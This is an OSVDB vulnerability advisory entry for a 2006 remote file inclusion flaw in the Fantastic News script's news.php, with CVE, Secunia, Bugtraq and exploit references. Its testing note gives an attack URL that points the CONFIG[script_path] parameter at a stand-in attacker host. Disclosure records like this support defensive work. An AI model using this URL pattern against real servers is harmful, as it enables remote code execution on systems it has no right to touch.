Fantastic News news.php CONFIG[script_path] Variable Remote File Inclusion

2006-08-19T06:34:02
ID OSVDB:28031
Type osvdb
Reporter OSVDB
Modified 2006-08-19T06:34:02

Description

Manual Testing Notes

http://[target]/[Script Path]/news.php?CONFIG[script_path]=http://[attacker]?

References:

Vendor URL: http://fscripts.com/free.php?id=1 Secunia Advisory ID:21571 Generic Exploit URL: http://milw0rm.com/exploits/2221 FrSIRT Advisory: ADV-2006-3336 CVE-2006-4285 Bugtraq ID: 19613